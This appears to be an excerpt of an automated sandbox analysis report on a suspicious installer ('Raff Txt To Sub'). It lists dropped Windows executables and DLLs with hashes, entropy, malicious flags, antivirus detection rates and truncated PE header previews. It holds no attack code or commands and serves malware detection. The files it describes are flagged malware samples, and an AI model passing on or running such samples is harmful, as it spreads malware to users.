                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#..............................xe.........................@.......{........ .........................+;......L.......0.................... ..8...................................................h................................text...............................`.P`.data...$...........................@.0..rdata.../.......0..................@.`@/4.......l.......n..................@.0@.bss....,.............................`..edata..+;.......<...d..............@.0@.idata..L...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...0...........................@.0..reloc..8.... ......................@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):64724
                                                                                Entropy (8bit):5.910307743399971
                                                                                Encrypted:false
                                                                                SSDEEP:768:U84Oo2LbVtfNsqnYPL7cZ690d+yCG7QiZggD0Spo3YfklbTRPmK0Lz:Uf2LbVtfDGLr2xk4DU3YfkhTRuKW
                                                                                MD5:7AF455ADEA234DEA33B2A65B715BF683
                                                                                SHA1:F9311CB03DCF50657D160D89C66998B9BB1F40BA
                                                                                SHA-256:6850E211D09E850EE2510F6EAB48D16E0458BCE35916B6D2D4EB925670465778
                                                                                SHA-512:B8AC3E2766BB02EC37A61218FAF60D1C533C0552B272AF6B41713C17AB69C3731FA28F3B5D73766C5C59794D5A38CC46836FD93255DF38F7A3ABD219D51BB41A
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....h........................lm.........................P................ .................................."...0..`....................@............................... .......................................................text...dg.......h..................`.P`.data...0............l..............@.0..rdata...............n..............@.@@/4......\............z..............@.0@.bss....,.............................`..edata..............................@.0@.idata...".......$..................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..rsrc...`....0......................@.0..reloc.......@......................@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):92019
                                                                                Entropy (8bit):5.974787373427489
                                                                                Encrypted:false
                                                                                SSDEEP:1536:+j80nVGEhJyBnvQXUDkUPoWCSgZosDGMsZLXWU9+HN4yoRtJJ:C8IgtyUDkBWIZosDGDBXWPHN4yoRtJJ
                                                                                MD5:CC7DAD980DD04E0387795741D809CBF7
                                                                                SHA1:A49178A17B1C72AD71558606647F5011E0AA444B
                                                                                SHA-256:0BAE9700E29E4E7C532996ADF6CD9ADE818F8287C455E16CF2998BB0D02C054B
                                                                                SHA-512:E4441D222D7859169269CA37E491C37DAA6B3CDD5F4A05A0A246F21FA886F5476092E64DFF88890396EF846B9E8D2880E33F1F594CD61F09023B3EF4CD573EA3
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(....0..7......#.........,.....................m................................B......... ...................... .......0...*...........................................................p......................t5...............................text..............................`.P`.data... ...........................@.0..rdata..............................@.`@/4.......(.......*..................@.0@.bss..................................`..edata....... ......................@.0@.idata...*...0...,..................@.0..CRT....,....`....... ..............@.0..tls.... ....p......."..............@.0..rsrc................$..............@.0..reloc...............(..............@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):165739
                                                                                Entropy (8bit):6.062324507479428
                                                                                Encrypted:false
                                                                                SSDEEP:3072:wqozCom32MhGf+cPlDQ6jGQGExqLsGXnru+5FMCp:wqxo4LGlDQ6yQGsqLsGXruSFMCp
                                                                                MD5:E2F18B37BC3D02CDE2E5C15D93E38418
                                                                                SHA1:1A6C58F4A50269D3DB8C86D94B508A1919841279
                                                                                SHA-256:7E555192331655B04D18F40E8F19805670D56FC645B9C269B9F10BF45A320C97
                                                                                SHA-512:61AB4F3475B66B04399111B106C3F0A744DC226A59EB03C134AE9216A9EA0C7F9B3B211148B669C32BAFB05851CC6C18BD69EA431DBC2FE25FE470CB4786FD17
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........0.........#.........,.....................n................................&......... .........................y....0...D..................................................................................x7...............................text...............................`.P`.data... ...........................@.0..rdata..............................@.`@/4......Dg.......h..................@.0@.bss....(....p........................`..edata..y............8..............@.0@.idata...D...0...F..................@.0..CRT....,............ ..............@.0..tls.... ............"..............@.0..reloc...............$..............@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):101544
                                                                                Entropy (8bit):6.237382830377451
                                                                                Encrypted:false
                                                                                SSDEEP:1536:nrYjG+7rjCKdiZ4axdj+nrlv3ecaQZ93yQNMRP2Ea5JPTxi0C9A046QET:M9eKdiBxUnfb3yZROEYJPTxib9A5ET
                                                                                MD5:E13FCD8FB16E483E4DE47A036687D904
                                                                                SHA1:A54F56BA6253D4DECAAE3DE8E8AC7607FD5F0AF4
                                                                                SHA-256:0AC1C17271D862899B89B52FAA13FC4848DB88864CAE2BF4DC7FB81C5A9A49BF
                                                                                SHA-512:38596C730B090B19E34183182273146C3F164211644EBC0A698A83651B2753F7D9B1D6EE477D1798BD7219B5977804355E2F57B1C3013BF3D498BF96DEC9D02E
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#.........`....................Hk.................................$........ ......................`..-....p......................................................................................Lt...............................text...............................`.P`.data...L...........................@.0..rdata..............................@.`@/4.......*... ...,..................@.0@.bss.........P........................`..edata..-....`.......*..............@.0@.idata.......p... ...0..............@.0..CRT....,............P..............@.0..tls.... ............R..............@.0..rsrc................T..............@.0..reloc...............X..............@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):291245
                                                                                Entropy (8bit):6.234245376773595
                                                                                Encrypted:false
                                                                                SSDEEP:6144:dg6RpdbWJbnZ9zwvNOmdcm0sn+g2eqZq6eadTD8:UJ99zwvNOmdcm0s+g1qZQadTD8
                                                                                MD5:2D8A0BC588118AA2A63EED7BF6DFC8C5
                                                                                SHA1:7FB318DC21768CD62C0614D7AD773CCFB7D6C893
                                                                                SHA-256:707DEE17E943D474FBE24EF5843A9A37E923E149716CAD0E2693A0CC8466F76E
                                                                                SHA-512:A296A8629B1755D349C05687E1B9FAE7ED5DE14F2B05733A7179307706EA6E83F9F9A8729D2B028EDDC7CAF8C8C30D69AD4FEA6EC19C66C945772E7A34F100DE
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........h..@......#.........d....................4i................................<......... ......................p..5.......t...................................................................................<................................text...T...........................`.P`.data...0...........................@.0..rdata...v.......x..................@.`@/4...........@......................@.0@.bss.........`........................`..edata..5....p.......6..............@.0@.idata..t............>..............@.0..CRT....,............F..............@.0..tls.... ............H..............@.0..reloc...............J..............@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):706136
                                                                                Entropy (8bit):6.517672165992715
                                                                                Encrypted:false
                                                                                SSDEEP:12288:8TCY9iAO+e+693qCfG0l2KDIq4N1i9aqi+:8piAO+e+69ne02KDINN1MaZ+
                                                                                MD5:3A8A13F0215CDA541EC58F7C80ED4782
                                                                                SHA1:085C3D5F62227319446DD61082919F6BE1EFD162
                                                                                SHA-256:A397C9C2B5CAC7D08A2CA720FED9F99ECE72078114FFC86DF5DBC2B53D5FA1AD
                                                                                SHA-512:4731D7ABB8DE1B77CB8D3F63E95067CCD7FAFED1FEB508032CB41EE9DB3175C69E5D244EEE8370DE018140D7B1C863A4E7AFBBE58183294A0E7CD98F2A8A0EAD
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.......Q......#..............................Pe......................... ................ .........................A.......L............................... ,......................................................,............................text...8...........................`.P`.data...............................@.P..rdata..............................@.`@/4......\............x..............@.0@.bss..................................`..edata..A........ ...^..............@.0@.idata..L............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc.. ,..........................@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):248781
                                                                                Entropy (8bit):6.474165596279956
                                                                                Encrypted:false
                                                                                SSDEEP:3072:oW4uzRci3pB4FvOhUHN1Dmfk46sR6/9+B7Bt9Z42fTSCi3QUqbQrPeL8rFErGfju:n4uB4FvHNElE9+B7Bj6GTSCiZPNVS
                                                                                MD5:C4002F9E4234DFB5DBE64C8D2C9C2F09
                                                                                SHA1:5C1DCCE276FDF06E6AA1F6AD4D4B49743961D62D
                                                                                SHA-256:F5BC251E51206592B56C3BD1BC4C030E2A98240684263FA766403EA687B1F664
                                                                                SHA-512:4F7BC8A431C07181A3D779F229E721958043129BBAEC65A538F2DD6A2CAB8B4D6165B4149B1DF56B31EB062614363A377E1982FD2F142E49DA524C1C96FC862E
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 2%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........]......#...............................h......................... .......!........ .........................A.......\.......................................................................................\............................text..............................`.P`.data...T...........................@.0..rdata..P[.......\..................@.`@/4.......v...0...v..................@.0@.bss..................................`..edata..A........ ..................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..............................@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):248694
                                                                                Entropy (8bit):6.346971642353424
                                                                                Encrypted:false
                                                                                SSDEEP:6144:MUijoruDtud8kVtHvBcEcEJAbNkhJIXM3rhv:Cy8kTHvBcE1kI3rhv
                                                                                MD5:39A15291B9A87AEE42FBC46EC1FE35D6
                                                                                SHA1:AADF88BBB156AD3CB1A2122A3D6DC017A7D577C1
                                                                                SHA-256:7D4546773CFCC26FEC8149F6A6603976834DC06024EEAC749E46B1A08C1D2CF4
                                                                                SHA-512:FF468FD93EFDB22A20590999BC9DD68B7307BD406EB3746C74A3A472033EA665E6E3F778325849DF9B0913FFC7E4700E2BEED4666DA6E713D984E92F9DB5F679
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....x.........................i.......................................... ......................`..u........1...................................................................................................................text...Tw.......x..................`.P`.data................|..............@.`..rdata..t;.......<...~..............@.`@/4.......f.......h..................@.0@.bss.........P........................`..edata..u....`......."..............@.0@.idata...1.......2...>..............@.0..CRT....,............p..............@.0..tls.... ............r..............@.0..reloc...............t..............@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):30994
                                                                                Entropy (8bit):5.666281517516177
                                                                                Encrypted:false
                                                                                SSDEEP:768:SrCNSOFBZVDIxxDsIpx0uZjaYNdJSH6J6:SrCyx0maYNdh6
                                                                                MD5:3C033F35FE26BC711C4D68EB7CF0066D
                                                                                SHA1:83F1AED76E6F847F6831A1A1C00FEDC50F909B81
                                                                                SHA-256:9BA147D15C8D72A99BC639AE173CFF2D22574177242A7E6FE2E9BB09CC3D5982
                                                                                SHA-512:7811BE5CCBC27234CE70AB4D6541556612C45FE81D5069BA64448E78953387B1C023AA2A04E5DBF8CAACE7291B8B020BEE2F794FBC190837F213B8D6CB698860
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........p..8......#.....*...l...............@.....j.......................................... .........................a.......(...............................x...................................................,................................text...8(.......*..................`.P`.data... ....@......................@.0..rdata.......P.......0..............@.0@/4...........`.......6..............@.0@.bss..................................`..edata..a............L..............@.0@.idata..(............`..............@.0..CRT....,............h..............@.0..tls.... ............j..............@.0..reloc..x............l..............@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):448557
                                                                                Entropy (8bit):6.353356595345232
                                                                                Encrypted:false
                                                                                SSDEEP:12288:TC5WwqtP7JRSIOKxQg2FgggggggTggZgoggggggggggggggggggnggDggD7d:TC5WltP7JRSIOKxmeR
                                                                                MD5:908111F583B7019D2ED3492435E5092D
                                                                                SHA1:8177C5E3B4D5CC1C65108E095D07E0389164DA76
                                                                                SHA-256:E8E2467121978653F9B6C69D7637D8BE1D0AC6A4028B672A9B937021AD47603C
                                                                                SHA-512:FD35BACAD03CFA8CD1C0FFF2DAC117B07F516E1E37C10352ED67E645F96E31AC499350A2F21702EB51BE83C05CF147D0876DAC34376EEDE676F3C7D4E4A329CB
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 2%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....,...................@.....i......................... ......._........ .........................[.......X...............................(&...................................................... ............................text...d*.......,..................`.P`.data........@.......0..............@.`..rdata......P.......2..............@.`@/4..................................@.0@.bss....|.............................`..edata..[............j..............@.0@.idata..X...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..(&.......(..................@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):65181
                                                                                Entropy (8bit):6.085572761520829
                                                                                Encrypted:false
                                                                                SSDEEP:768:1JrcDWlFkbBRAFqDnlLKgprfElH0hiGoeLXRcW/VB6dkhxLemE5ZHvIim3YWATMk:XrTk3iqzlLKgp6H38B6u0Uim3Y15P
                                                                                MD5:98A49CC8AE2D608C6E377E95833C569B
                                                                                SHA1:BA001D8595AC846D9736A8A7D9161828615C135A
                                                                                SHA-256:213B6ADDAB856FEB85DF1A22A75CDB9C010B2E3656322E1319D0DEF3E406531C
                                                                                SHA-512:C9D756BB127CAC0A43D58F83D01BFE1AF415864F70C373A933110028E8AB0E83612739F2336B28DC44FAABA6371621770B5BCC108DE7424E31378E2543C40EFC
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........[......#...............................d.........................p................ .............................. .......P..P....................`..x............................@.......................!..\............................text...D...........................`.P`.data...D...........................@.0..rdata..l...........................@.0@/4......p/.......0..................@.0@.bss..................................`..edata..............................@.0@.idata....... ......................@.0..CRT....0....0......................@.0..tls.... ....@......................@.0..rsrc...P....P......................@.0..reloc..x....`......................@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:modified
                                                                                Size (bytes):3295744
                                                                                Entropy (8bit):6.761851444843067
                                                                                Encrypted:false
                                                                                SSDEEP:24576:31FmlZTruZZAJwOo/l56wD4KmpIp8qUIOD8Voc2kSB3yHcOoCBw5F8qV3B/Xv26+:FKHZotmpNI3ICzd7pT+mEthKtgVUr
                                                                                MD5:B00E7D6666B62AB3475B654070B1BC1B
                                                                                SHA1:12215953D041D5F1916C5AC383E546990A2E95CC
                                                                                SHA-256:D698FE951989D3584AFB0B26CF3F73C5A3840746C186ED7555D0D4E032EE5AF5
                                                                                SHA-512:6AB91E96D236DBAA7252CE8C3A89257A281B16EDA4859396861051B86ACEF11E3BF336E063221A7A31F01C87C18D6FEA5B4B52099A9C58DDC98BD710F28DDF6A
                                                                                Malicious:true
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...&M.L.................x...$......`2............@...........................2.......2..............................................P ..x..............................................................................4............................text....w.......x..................`....rdata...#.......$...|..............@..@.data...8........0..................@....rsrc....z...P ..z..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):673546
                                                                                Entropy (8bit):6.4805724793716815
                                                                                Encrypted:false
                                                                                SSDEEP:12288:3euHnWgyrgVu4rPy37WzH0A6uaF4Ad7dNsVN1qRq0D1kxpf:OuHcrgVxrPy37WzH0A6uwpd7QN12Jkx1
                                                                                MD5:38C1105B0BF3AFCF8C0F045F08CC004E
                                                                                SHA1:1A4BC857E26F8D65CE19FB42B660E70BAC275E47
                                                                                SHA-256:11A754C5D2C21E2E00D669A10E14D075291F482866E5335C0917A55F10F5F4D8
                                                                                SHA-512:DE7AEA0DD21403397CFE69821F90F39077B835BDDCF26B792FEB88EDE9ACD2AD3432868E461D64E6DCC7ECA23DD41634FFA594C9274F3DFC19E836CBF2F1F333
                                                                                Malicious:true
                                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................L.............@..............................................@.............................."%......./...................................................@......................................................CODE....p........................... ..`DATA................................@...BSS.....T................................idata.."%.......&..................@....tls.........0...........................rdata.......@......................@..P.reloc.......P......................@..P.rsrc....0.......0..................@..P....................................@..P........................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:InnoSetup Log Raff Txt To Sub, version 0x2a, 5653 bytes, 767668\user, "C:\Users\user\AppData\Local\Raff Txt To Sub"
                                                                                Category:dropped
                                                                                Size (bytes):5653
                                                                                Entropy (8bit):4.84474424425285
                                                                                Encrypted:false
                                                                                SSDEEP:48:RXQYlxlSyMJLBv8SG488WpuLlLr8VdO9s+4bLVO3471WlMWvblfnlu0l9lElTlFF:KeaNp8x488Wput8VE9s+eOIhBWtk2Le
                                                                                MD5:A5B89B8B8F429674E9FEEE1F80BB5262
                                                                                SHA1:2D8E3D713BB28CA232D9AF7618DA100D862B7C9B
                                                                                SHA-256:7BF7249D6016D2234B1CF0D15497AE83AB06CECC54825F8558459E908E813D40
                                                                                SHA-512:7FEF2D1ABAF9945F73A50FE658667BA6B216AF87E3178176D9EAB9F82D1456437A892ED39802020B2FCC0E1EE7E1EC6193AC23D4464B421B438349B0307BE229
                                                                                Malicious:false
                                                                                Preview:Inno Setup Uninstall Log (b)....................................Raff Txt To Sub.................................................................................................................Raff Txt To Sub.................................................................................................................*...".......%................................................................................................................3.............X......L....767668.user,C:\Users\user\AppData\Local\Raff Txt To Sub...........&...... ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..'...dll:kernel32.dll.CreateFileA.............#...dll:kernel32.dll.WriteFile...........!...dll:kernel32.dll.CloseHandle.......!...dll:kernel32.dll.ExitProcess.......$...dll:User32.dll.Get
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):673546
                                                                                Entropy (8bit):6.4805724793716815
                                                                                Encrypted:false
                                                                                SSDEEP:12288:3euHnWgyrgVu4rPy37WzH0A6uaF4Ad7dNsVN1qRq0D1kxpf:OuHcrgVxrPy37WzH0A6uwpd7QN12Jkx1
                                                                                MD5:38C1105B0BF3AFCF8C0F045F08CC004E
                                                                                SHA1:1A4BC857E26F8D65CE19FB42B660E70BAC275E47
                                                                                SHA-256:11A754C5D2C21E2E00D669A10E14D075291F482866E5335C0917A55F10F5F4D8
                                                                                SHA-512:DE7AEA0DD21403397CFE69821F90F39077B835BDDCF26B792FEB88EDE9ACD2AD3432868E461D64E6DCC7ECA23DD41634FFA594C9274F3DFC19E836CBF2F1F333
                                                                                Malicious:true
                                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................L.............@..............................................@.............................."%......./...................................................@......................................................CODE....p........................... ..`DATA................................@...BSS.....T................................idata.."%.......&..................@....tls.........0...........................rdata.......@......................@..P.reloc.......P......................@..P.rsrc....0.......0..................@..P....................................@..P........................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):98626
                                                                                Entropy (8bit):6.478068795827396
                                                                                Encrypted:false
                                                                                SSDEEP:1536:HDuZqv5WNPuWOD+QZ7OWN4oOlatKZ2XGnToIfQIOEIOGxpdo4VoWsj:r9P6WN4wyTBfGqGxpdo4VoB
                                                                                MD5:70CA53E8B46464CCF956D157501D367A
                                                                                SHA1:AE0356FAE59D9C2042270E157EA0D311A831C86A
                                                                                SHA-256:4A7AD2198BAACC14EA2FFD803F560F20AAD59C3688A1F8AF2C8375A0D6CC9CFE
                                                                                SHA-512:CB1D52778FE95D7593D1FDBE8A1125CD19134973B65E45F1E7D21A6149A058BA2236F4BA90C1CE01B1B0AFAD4084468D1F399E98C1F0D6F234CBA023FCC7B4AE
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....='=.x..=......#.........t.....................c.......................................... .................................8...............................0...................................................0................................text...t...........................`.P`.data... ...........................@.0..rdata...M.......N..................@.`@/4......t&...P...(...4..............@.0@.bss..................................`..edata...............\..............@.0@.idata..8............f..............@.0..CRT....,............n..............@.0..tls.... ............p..............@.0..reloc..0............r..............@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\Desktop\JtDj8LXROa.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):663040
                                                                                Entropy (8bit):6.47107473872237
                                                                                Encrypted:false
                                                                                SSDEEP:12288:PeuHnWgyrgVu4rPy37WzH0A6uaF4Ad7dNsVN1qRq0D1kxp:WuHcrgVxrPy37WzH0A6uwpd7QN12Jkxp
                                                                                MD5:5EC1C51DA61B4F15B2F40339D7D1DF7C
                                                                                SHA1:BAB46AF9F3D1D78130D73951022B163720BC040F
                                                                                SHA-256:AE8D36E1EDC71BCB37C4636E2C8B364698F0238039CB7E12571022A94FB66897
                                                                                SHA-512:B2B208E0B9D3508BF958DDA89D16286921664833DE9D237EC61CC9402F36CE380CC361DCF4B1373505AF6E56254515C74F49D58A099C5DA90F9052697342825E
                                                                                Malicious:true
                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................L.............@..............................................@.............................."%......./...................................................@......................................................CODE....p........................... ..`DATA................................@...BSS.....T................................idata.."%.......&..................@....tls.........0...........................rdata.......@......................@..P.reloc.......P......................@..P.rsrc....0.......0..................@..P....................................@..P........................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):2048
                                                                                Entropy (8bit):3.95064105469356
                                                                                Encrypted:false
                                                                                SSDEEP:24:ev1GSdXX7gQ1zWiR1viPnBpuivjll9itfXS3SHi2qHvjPBvP0:qr1zWiyDuivJlEt/QJ2qPjPBE
                                                                                MD5:BB211D7A8CEA15072DE7425403508C17
                                                                                SHA1:3DF747464C8CCDCF5E7410A5137323A4588AF470
                                                                                SHA-256:E71EC712064F193C367B0BB95A07A6DD9EB450BE1BE12CD48073FEFA1C3E0E58
                                                                                SHA-512:12BF06052D1D2F1826B6BAF73A547184687DAA9E849B29A93478C09F1BD2FE97225020690BD4C663174B5AF1274EDCB7B08DFAAD5AE25874F224E00BD47780B0
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........tb..tb..tb..|?..tb..tc..tb..x=..tb..x8..tb.Rich.tb.........................PE..L...EPdC..................................... ....@..........................0..............................................d ..<.................................................................................... ..<............................text............................... ..`.rdata....... ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):2560
                                                                                Entropy (8bit):2.8818118453929262
                                                                                Encrypted:false
                                                                                SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                MD5:A69559718AB506675E907FE49DEB71E9
                                                                                SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):4608
                                                                                Entropy (8bit):4.416719728245179
                                                                                Encrypted:false
                                                                                SSDEEP:48:68tbXKoGQ6oNrP/MXebrvrMTtFcEBO3K8/wzTqkO3KExygKBDM3f8:PX6Xe/DMTtWE0/wz5sxyblMv8
                                                                                MD5:42BF074B99A445614BD19C6E5724A01A
                                                                                SHA1:A07123ADBE7FA8BBD4A001332DC08AA6D3B5AEC0
                                                                                SHA-256:0A6C41612400C3400466A0583DBB0E6C9BD310393704807E4F9617AA53ABDED6
                                                                                SHA-512:58279D4DC7A09990302E73CB602FE3E1B1F7F8E5A0A5CD83760F99E093701F15C84BAE9692F9A4B61925F42272DFA56FED0DB8CDFE00EF509F88E91C22E185A2
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E...$...$...$.......$...$...$......$......$..Rich.$..........PE..d...hUbC..........#...........................@..............................P...............................................................!...............@..H.................................................................... ...............................text............................... ..`.rdata..l.... ......................@..@.data...,....0......................@....pdata..H....@......................@..@................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):23312
                                                                                Entropy (8bit):4.596242908851566
                                                                                Encrypted:false
                                                                                SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
